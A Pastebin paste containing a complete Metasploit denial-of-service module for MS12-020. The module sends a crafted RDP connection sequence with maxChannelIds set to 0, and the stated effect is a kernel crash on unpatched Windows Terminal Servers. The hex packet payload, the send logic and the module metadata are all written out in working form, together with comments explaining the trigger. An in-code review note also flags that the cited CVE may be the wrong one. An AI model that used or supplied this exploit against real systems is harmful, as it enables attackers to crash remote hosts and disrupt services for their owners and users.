ms12-020 metasploit dos module

a guest
Mar 18th, 2012
1,854
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
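  # Metasploit auxiliary DoS module for MS12-020 (RDP, TCP/3389).
  #
  # Sends one crafted RDP connection sequence -- a TPKT/X.224 Connection
  # Request, then an MCS Connect Initial carrying a GCC Conference Create
  # Request whose maxChannelIds field is 0, then one more short MCS PDU --
  # waits two seconds and closes the socket.  Nothing is read back, so the
  # module cannot tell a patched target from a vulnerable one; on an
  # unpatched Terminal Server the expected effect is a kernel crash (BSOD),
  # i.e. the whole host goes down, not just the service.  Run it only
  # against systems you are authorised to take offline.
  #
  # Fix over the original paste: the hex payload lines used
  # `"..".to_a.pack("H*")`, which relies on String#to_a (Ruby 1.8 only;
  # NoMethodError on 1.9+).  They now go through hex2bin, and the socket is
  # always closed in an ensure block.
  class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::Tcp
    include Msf::Auxiliary::Dos

    # Module metadata.  Only RPORT (default 3389) is registered here; RHOST
    # comes from the Tcp mixin.
    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'ms12-020',
        'Description'    => %q{
          MS12-020
        },
        'Author'         => [ 'a.maloteaux' ],
        'License'        => MSF_LICENSE,
        'Version'        => '$Revision: 14976 $',
        # NOTE(review): MS12-020 covers two issues, CVE-2012-0002 (RDP
        # maxChannelIds use-after-free) and CVE-2012-0152 (Terminal Server
        # DoS).  The packet built in #run sets maxChannelIds = 0, which is
        # the CVE-2012-0002 trigger -- confirm which CVE this entry should
        # cite before relying on the reference.
        'References'     =>
          [
            [ 'CVE', '2012-0152' ],
            [ 'MSB', 'MS12-020'],
            [ 'OSVDB', '80004' ],
            [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
          ],
        'DisclosureDate' => 'Mar 03 2012'))

      register_options(
        [
          Opt::RPORT(3389)
        ], self.class )
    end

    # Build the crafted connection sequence and send it to RHOST:RPORT.
    #
    # The randomised client name (padded to 16 chars, UTF-16LE) and product
    # id (padded to 32 chars, UTF-16LE) only make the Client Core Data look
    # like a normal client; the trigger is the maxChannelIds = 0 field in the
    # MCS Connect Initial.  The two-second select() gives the target time to
    # process the PDUs before the socket is dropped.  No response is read,
    # so success is never reported -- only a failure to connect or write.
    def run
      client_name = ::Rex::Text::to_unicode(
        ::Rex::Text::rand_text_alphanumeric(15 - rand(10)).ljust(16, "\x00"),
        'utf-16le')
      # 5-3-7-5 digit groups joined by '-' (23 chars), NUL padded to 32,
      # then UTF-16LE like the original.
      id_groups = [5, 3, 7, 5].map { |len| ::Rex::Text::rand_text_numeric(len) }
      client_product_id = ::Rex::Text::to_unicode(id_groups.join('-').ljust(32, "\x00"))

      # TPKT + X.224 Connection Request
      payload  = hex2bin("030000130EE000000000000100080000000000")
      # MCS Connect Initial PDU with GCC Conference Create Request
      payload << hex2bin("030001a002f0807f6582019404010104")
      payload << hex2bin("01010101ff3019")
      payload << hex2bin("020100") # maxChannelIds = 0 -- the trigger field
      payload << hex2bin("020102020100")
      payload << hex2bin("0201010201000201010202ffff020102")
      payload << hex2bin("30190201010201010201010201010201")
      payload << hex2bin("0002010102020420020102301c0202ff")
      payload << hex2bin("ff0202fc170202ffff02010102010002")
      payload << hex2bin("01010202ffff02010204820133000500")
      payload << hex2bin("147c0001812a000800100001c0004475")
      payload << hex2bin("6361811c01c0d8000400080000050004")
      payload << hex2bin("01ca03aa09040000ce0e0000")
      payload << client_name
      payload << hex2bin("04000000")
      payload << hex2bin("000000000c0000000000000000000000")
      payload << hex2bin("00000000000000000000000000000000")
      payload << hex2bin("00000000000000000000000000000000")
      payload << hex2bin("00000000000000000000000000000000")
      payload << hex2bin("000000000000000001ca010000000000")
      payload << hex2bin("180007000100")
      payload << client_product_id
      payload << hex2bin("00000000000004c00c00")
      payload << hex2bin("0d0000000000000002c00c001b000000")
      payload << hex2bin("0000000003c02c000300000072647064")
      payload << hex2bin("7200000000008080636c697072647200")
      payload << hex2bin("0000a0c0726470736e640000000000c0")
      # User Request PDU
      payload << hex2bin("0300000802f08028")

      begin
        connect
        sock.put(payload)
        # Let the target process the PDUs before we tear the socket down.
        Kernel.select(nil, nil, nil, 2)
      rescue ::StandardError => e
        # Connect failures land here, but so does a reset while writing --
        # on a vulnerable target that can mean the host is already going
        # down, so the underlying error is reported rather than hidden.
        print_error("Server not available (#{e.class}: #{e.message})")
      ensure
        # Always release the socket; the original left it open on both paths.
        disconnect if sock
      end
    end

    private

    # Decode a hex string into raw bytes.  Portable replacement for the
    # original `str.to_a.pack("H*")`, which needs String#to_a (Ruby 1.8).
    def hex2bin(str)
      [str].pack("H*")
    end
  end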